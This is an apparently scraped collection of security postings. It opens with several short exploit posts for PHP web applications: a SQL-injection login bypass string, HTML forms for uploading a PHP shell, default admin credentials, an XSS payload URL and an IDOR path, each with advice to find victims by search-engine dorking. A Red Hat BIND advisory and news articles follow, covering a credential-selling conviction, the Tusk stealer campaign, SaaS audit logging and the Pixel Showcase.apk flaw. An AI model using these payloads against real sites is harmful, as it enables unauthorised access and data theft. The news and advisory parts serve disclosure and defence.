Hotel Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Hotel Management System 1.0 auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use Payload : user&pass = ' or 0=0 ##[+] http://127.0.0.1/hotel/admin/index.php?page=homeGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Hotel Management System 1.0 SQL Injection

Hotel Booking System version 1.0 suffers from a remote shell upload vulnerability.

=============================================================================================================================================  
| # Title     : Hotel Booking System 1.0 Remote File Upload Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel.zip                                             |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely upload malicious PHP files directly.

[+] Line 9 set url of target.

[+] The path to upload the files : http://127.0.0.1/hotel/uploadImage\Profile

[+] Save Code as html :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Image Upload Form</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/source%20code/profile.php" method="POST" enctype="multipart/form-data">  
        <label for="image">Upload an image:</label>  
        <input type="file" id="image" name="image" accept="image/*" required>  
        <button type="submit" name="btn_update">Upload</button>  
    </form>  
</body>  
</html>

[+] part 2 : infected item ( manage_website.php ) .

[+] Line 9 set url of target.

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Update Website Images</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/source%20code/manage_website.php" method="POST" enctype="multipart/form-data">  
        <input type="hidden" name="old_website_image" value="current_website_image.jpg">  
        <label for="website_image">Upload new website image:</label>  
        <input type="file" id="website_image" name="website_image" accept="image/*">

                <input type="hidden" name="old_login_image" value="current_login_image.jpg">  
        <label for="login_image">Upload new login image:</label>  
        <input type="file" id="login_image" name="login_image" accept="image/*">

                <input type="hidden" name="old_back_login_image" value="current_back_login_image.jpg">  
        <label for="back_login_image">Upload new back login image:</label>  
        <input type="file" id="back_login_image" name="back_login_image" accept="image/*">

                <button type="submit" name="btn_web">Update Images</button>  
    </form>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Hotel Booking System 1.0 Shell Upload

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

**Home Owners Collection Management System 1.0 Insecure Settings**

Posted Aug 16, 2024

Authored by indoushka

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 94fb8d8c82f8132953cb67c97a9b682c8e63a436a475a575173b89ddf54daa9f

Download | Favorite | View

**Home Owners Collection Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Home Owners Collection Management System v1.0 Insecure Settings Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Home Owners Collection Management System 1.0 Insecure Settings

Red Hat Security Advisory 2024-5231-03 - An update for bind and bind-dyndb-ldap is now available for Red Hat Enterprise Linux 9.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5231.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: bind and bind-dyndb-ldap security update  
Advisory ID:        RHSA-2024:5231-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5231  
Issue date:         2024-08-15  
Revision:           03  
CVE Names:          CVE-2024-1737  
====================================================================

Summary: 

An update for bind and bind-dyndb-ldap is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.

Security Fix(es):

* bind: bind9: BIND's database will be slow if a very large number of RRs exist at the same nam (CVE-2024-1737)

* bind9: bind: SIG(0) can be used to exhaust CPU resources (CVE-2024-1975)

* bind: bind9: Assertion failure when serving both stale cache data and authoritative zone content (CVE-2024-4076)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1737

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2298893  
https://bugzilla.redhat.com/show_bug.cgi?id=2298901  
https://bugzilla.redhat.com/show_bug.cgi?id=2298904

Red Hat Security Advisory 2024-5231-03

Giftora version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Giftora V 1.0 XSS Vulnerability                                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script                                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /search?q=1'%22()%26%25<acx><ScRiPt%20>prompt(966079)</ScRiPt>[+] save code as poc.html [+] payload : https://127.0.0.1/giftora.webister.net//search?q=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(966079)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Giftora 1.0 Cross Site Scripting

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

Posted Aug 16, 2024

Authored by indoushka

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 98c12c7a5556d4399b71f053e8f21eaf5c59e49e15d4bf7f6b1980de56fec3c2

Download | Favorite | View

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Bhojon restaurant management system v3.0 IDOR Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /dashboard/autoupdate[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference

A 27-year-old Russian national has been sentenced to over three years in prison for peddling financial information, login credentials, and other personally identifying information (PII) on a now-defunct dark web marketplace called Slilpp.
Georgy Kavzharadze, 27, of Moscow, Russia, pleaded guilty to one count of conspiracy to commit bank fraud and wire fraud earlier this February. In addition to

A 27-year-old Russian national has been sentenced to over three years in prison for peddling financial information, login credentials, and other personally identifying information (PII) on a now-defunct dark web marketplace called Slilpp.

Georgy Kavzharadze, 27, of Moscow, Russia, pleaded guilty to one count of conspiracy to commit bank fraud and wire fraud earlier this February. In addition to a 40-month jail term, Kavzharadze has been ordered to pay $1,233,521.47 in restitution.

The defendant, who went by the online monikers TeRorPP, Torqovec, and PlutuSS, is believed to have listed over 626,100 stolen login credentials for sale on Slilpp and sold more than 297,300 of them on the illicit marketplace between July 2016 and May 2021.

"Those credentials were subsequently linked to $1.2 million in fraudulent transactions," the U.S. Department of Justice (DoJ) said.

"On May 27, 2021, Kavzharadze's account on Slilpp listed 240,495 login credentials for sale that would allow the buyer to use the information to steal money from the victim's online payment and bank accounts."

Kavzharadze is estimated to have made no less than $200,000 in profits from the sale of stolen credentials. In August 2021, he was charged with conspiracy to commit bank fraud and wire fraud, bank fraud, access device fraud, and aggravated identity theft. He was subsequently extradited to the U.S. to face the charges.

Slilpp was one of the largest marketplaces that specialized in the sale of login credentials until June 2021, when its infrastructure was dismantled as part of an international law enforcement operation involving authorities from the U.S., Germany, the Netherlands, and Romania.

It had been in operation since 2012, selling more than 80 million login credentials from over 1,400 companies.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian Hacker Jailed 3+ Years for Selling Stolen Credentials on Dark Web

Cybersecurity researchers have shed light on a sophisticated information stealer campaign that impersonates legitimate brands to distribute malware like DanaBot and StealC.
The activity cluster, orchestrated by Russian-speaking cybercriminals and collectively codenamed Tusk, is said to encompass several sub-campaigns, leveraging the reputation of the platforms to trick users into downloading the

Cybersecurity researchers have shed light on a sophisticated information stealer campaign that impersonates legitimate brands to distribute malware like DanaBot and StealC.

The activity cluster, orchestrated by Russian-speaking cybercriminals and collectively codenamed Tusk, is said to encompass several sub-campaigns, leveraging the reputation of the platforms to trick users into downloading the malware using bogus sites and social media accounts.

"All the active sub-campaigns host the initial downloader on Dropbox," Kaspersky researchers Elsayed Elrefaei and AbdulRhman Alfaifi said. "This downloader is responsible for delivering additional malware samples to the victim's machine, which are mostly info-stealers (DanaBot and StealC) and clippers."

Of the 19 sub-campaigns identified to date, three are said to be currently active. The name "Tusk" is a reference to the word "Mammoth" used by the threat actors in log messages associated with the initial downloader. It's worth noting that mammoth is a slang term often used by Russian e-crime groups to refer to victims.

The campaigns are also notable for employing phishing tactics to deceive victims into parting with their personal and financial information, which is then sold on the dark web or used to gain unauthorized access to their gaming accounts and cryptocurrency wallets.

The first of the three sub-campaigns, known as TidyMe, mimics peerme\[.\]io with a lookalike site hosted on tidyme\[.\]io (as well as tidymeapp\[.\]io and tidyme\[.\]app) that solicits a click to download a malicious program for both Windows and macOS systems that's served from Dropbox.

The downloader is an Electron application that, when launched, prompts the victim to enter the CAPTCHA displayed, after which the main application interface is displayed, while two additional malicious files are covertly fetched and executed in the background.

Both the payloads observed in the campaign are Hijack Loader artifacts, which ultimately launch a variant of the StealC stealer malware with capabilities to harvest a wide range of information.

RuneOnlineWorld ("runeonlineworld\[.\]io"), the second sub-campaign, involves the use of a bogus website simulating a massively multiplayer online (MMO) game named Rise Online World to distribute a similar downloader that paves the way for DanaBot and StealC on compromised hosts.

Also distributed via Hijack Loader in this campaign is a Go-based clipper malware that's designed to monitor clipboard content and substitute wallet addresses copied by the victim with an attacker-controlled Bitcoin wallet to perform fraudulent transactions.

Rounding off the active campaigns is Voico, which impersonates an AI translator project called YOUS (yous\[.\]ai) with a malicious counterpart dubbed voico\[.\]io in order to disseminate an initial downloader that, upon installation, asks the victim to fill out a registration form containing their credentials and then logs the information on the console.

The final payloads exhibit similar behavior as that of the second sub-campaign, the only distinction being the StealC malware used in this case communicates with a different command-and-control (C2) server.

"The campaigns \[...\] demonstrate the persistent and evolving threat posed by cybercriminals who are adept at mimicking legitimate projects to deceive victims," the researchers said. "The reliance on social engineering techniques such as phishing, coupled with multistage malware delivery mechanisms, highlights the advanced capabilities of the threat actors involved."

"By exploiting the trust users place in well-known platforms, these attackers effectively deploy a range of malware designed to steal sensitive information, compromise systems, and ultimately achieve financial gain."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian Hackers Using Fake Brand Sites to Spread DanaBot and StealC Malware

SaaS applications have become indispensable for organizations aiming to enhance productivity and streamline operations. However, the convenience and efficiency these applications offer come with inherent security risks, often leaving hidden gaps that can be exploited. Conducting thorough due diligence on SaaS apps is essential to identify and mitigate these risks, ensuring the protection of your

SaaS Security / Threat Detection

SaaS applications have become indispensable for organizations aiming to enhance productivity and streamline operations. However, the convenience and efficiency these applications offer come with inherent security risks, often leaving hidden gaps that can be exploited. Conducting thorough due diligence on SaaS apps is essential to identify and mitigate these risks, ensuring the protection of your organization's sensitive data.

**Understanding the Importance of Due Diligence**

Due diligence is a critical step in evaluating the security capabilities of SaaS applications. It involves a comprehensive assessment of the app's audit log events, system and activity audits, and integration capabilities to ensure proper logging and monitoring, helping to prevent costly incidents. Here are a few reasons why due diligence is non-negotiable:

*   **Identifying Critical Audit Log Gaps:** A thorough review helps ensure that essential events, such as logins, MFA verifications, and user changes, are logged. This is crucial for maintaining visibility and quickly detecting any anomalies or unauthorized activities.
*   **Ensuring Comprehensive System and Activity Audits:** Due diligence verifies that all system changes and user activities, such as creating, updating, and deleting configurations and resources, are tracked. This comprehensive auditing is essential for maintaining a secure environment and quickly responding to potential threats.
*   **Evaluating Integration Capabilities with Existing Security Infrastructure:** It ensures that SaaS applications can integrate seamlessly with existing security tools like SIEM systems and API endpoints, facilitating better data correlation, enhanced threat detection, and streamlined security operations.

Failing to perform due diligence can lead to severe consequences, including data breaches, unauthorized access, and compliance issues, all of which can be costly and damaging to an organization's reputation.

**The Challenges of Completing Due Diligence**

Despite its importance, completing due diligence for SaaS applications is an often overlooked task due to several factors:

*   **Variety and Complexity**: The sheer number of SaaS apps, each with unique security features and data management practices, makes thorough evaluation challenging.
*   **Lack of Standardization:** Ensuring seamless integration with security tools like SIEMs and APIs can be difficult without a standardized approach.
*   **Resource Constraints**: Many organizations lack the expertise or resources to conduct comprehensive due diligence, leading to overlooked details.
*   **Coordination Across Departments**: Gathering necessary information and ensuring all departments are aligned can be time-consuming and cumbersome.

**Streamline Due Diligence with AppOmni's Due Diligence Questionnaire (DDQ) and SaaS Event Maturity Matrix (EMM)**

To simplify and expedite the due diligence process, AppOmni offers two essential resources: the Due Diligence Questionnaire (DDQ) and the **SaaS Event Maturity Matrix (EMM)**. The DDQ was designed by security professionals to guide organizations in identifying critical gaps in audit logs, enabling them to develop a detailed plan – whether for due-diligence of an application or onboarding.

The EMM makes filling out the DDQ a breeze by providing a standardized framework for assessing and organizing SaaS audit logs. The EMM simplifies the tracking and analysis of security events across various platforms, ensuring that critical activities like logins, user changes, and security configurations can be logged and monitored effectively. Read the EMM Data Sheet for more details.

Together, the DDQ and EMM shine a light on the hidden risk in audit log inconsistencies enabling organizations to refine the audit logging functions of their SaaS platforms, allowing security teams to enhance threat detection and response actions.

The DDQ and EMM enhance organizations risk preparedness by helping them:

*   **Identify Critical Audit Log Gaps:** Ensuring that critical events like login/logout, MFA verifications, user changes, and security configurations are comprehensively logged helps maintain visibility and enables quick detection of anomalies or unauthorized activities.
*   **Assess System and Activity Audits:** Verifying that all system changes and user activities, such as creating, updating, and deleting configurations and resources, are meticulously tracked is vital for maintaining a secure environment and swiftly responding to potential threats.
*   **Evaluate Integration Capabilities:** Ensuring that your SaaS applications can seamlessly integrate with existing security infrastructure like SIEM tools and API endpoints facilitates better data correlation, enhances threat detection, and streamlines security operations.
*   **Enhance Security Protocols and Configurations:** Proactively updating security settings to close logging gaps and prevent potential vulnerabilities helps maintain a robust security posture.
*   **Develop a Detailed Onboarding Plan:** Addressing security gaps before onboarding new SaaS applications ensures proper logging and monitoring from day one, reducing risks from the outset.

**Download the Due Diligence Questionnaire for SaaS Security**

Uncover and address security gaps in your SaaS applications. Use the DDQ to help guide and develop a systematic approach for understanding security practices and monitoring SaaS application logs.

**How to use the DDQ and EMM**

1.  **Download and Customize the DDQ**: Start by downloading the DDQ and tailoring it to fit the specific SaaS applications used in your organization.
2.  **Assess Logging Capabilities with EMM**: Use the EMM to evaluate the audit logs of your SaaS apps. Identify gaps in logging critical events such as logins, MFA verifications, and user changes.
3.  **Fill Out the DDQ**: Based on the insights from the EMM, complete the DDQ to get a detailed understanding of each application's security posture.
4.  **Implement Findings in AppOmni**: Utilize the findings from the DDQ to enhance your security measures. Integrate your findings with AppOmni to streamline the tracking of critical audit logs, address configuration drifts, and enforce consistent security policies across your SaaS applications.

By leveraging the DDQ and EMM, organizations can streamline the due diligence process, identify and address security gaps, and enhance threat detection to take a risk-based approach to SaaS security management.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Hidden Security Gaps in Your SaaS Apps: Are You Doing Due Diligence?

A large percentage of Google's own Pixel devices shipped globally since September 2017 included dormant software that could be used to stage nefarious attacks and deliver various kinds of malware.
The issue manifests in the form of a pre-installed Android app called "Showcase.apk" that comes with excessive system privileges, including the ability to remotely execute code and install arbitrary

Mobile Security / Software Security

A large percentage of Google's own Pixel devices shipped globally since September 2017 included dormant software that could be used to stage nefarious attacks and deliver various kinds of malware.

The issue manifests in the form of a pre-installed Android app called "Showcase.apk" that comes with excessive system privileges, including the ability to remotely execute code and install arbitrary packages on the device, according to mobile security firm iVerify.

"The application downloads a configuration file over an unsecure connection and can be manipulated to execute code at the system level," it said in an analysis published jointly with Palantir Technologies and Trail of Bits.

"The application retrieves the configuration file from a single U.S.-based, AWS-hosted domain over unsecured HTTP, which leaves the configuration vulnerable and can make the device vulnerable."

The app in question is called Verizon Retail Demo Mode ("com.customermobile.preload.vzw"), which requires nearly three dozen different permissions based on artifacts uploaded to VirusTotal earlier this February, including location and external storage. Posts on Reddit and XDA Forums show that the package has been around since August 2016.

The crux of the problem has to do with the app downloading a configuration file over an unencrypted HTTP web connection, as opposed to HTTPS, thereby opening the door for altering it during transit to the targeted phone. There is no evidence that it was ever explored in the wild.

Permissions requested by the Showcase.apk app

It's worth noting that the app is not Google-made software. Rather it's developed by an enterprise software company called Smith Micro to put the device in demo mode. It's currently not clear why third-party software is directly embedded into Android firmware, but, on the background, a Google representative said the application is owned and required by Verizon on all Android devices.

The net result is that it leaves Android Pixel smartphones susceptible to adversary-in-the-middle (AitM) attacks, granting malicious actors powers to inject malicious code and spyware.

Besides running in a highly privileged context at the system level, the application "fails to authenticate or verify a statically defined domain during retrieval of the application's configuration file" and "uses unsecure default variable initialization during certificate and signature verification, resulting in valid verification checks after failure."

That said, the criticality of the shortcoming is mitigated to some extent by the fact that the app is not enabled by default, although it's possible to do so only when a threat actor has physical access to a target device and developer mode is enabled.

"Since this app is not inherently malicious, most security technology may overlook it and not flag it as malicious, and since the app is installed at the system level and part of the firmware image, it can not be uninstalled at the user level," iVerify said.

In a statement shared with The Hacker News, Google said it's neither an Android platform nor Pixel vulnerability, and that it's related to a package file developed for Verizon in-store demo devices. It also said the app is no longer being used.

"Exploitation of this app on a user phone requires both physical access to the device and the user's password," a Google spokesperson said. "We have seen no evidence of any active exploitation. Out of an abundance of precaution, we will be removing this from all supported in-market Pixel devices with an upcoming Pixel software update. The app is not present on Pixel 9 series devices. We are also notifying other Android OEMs."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#auth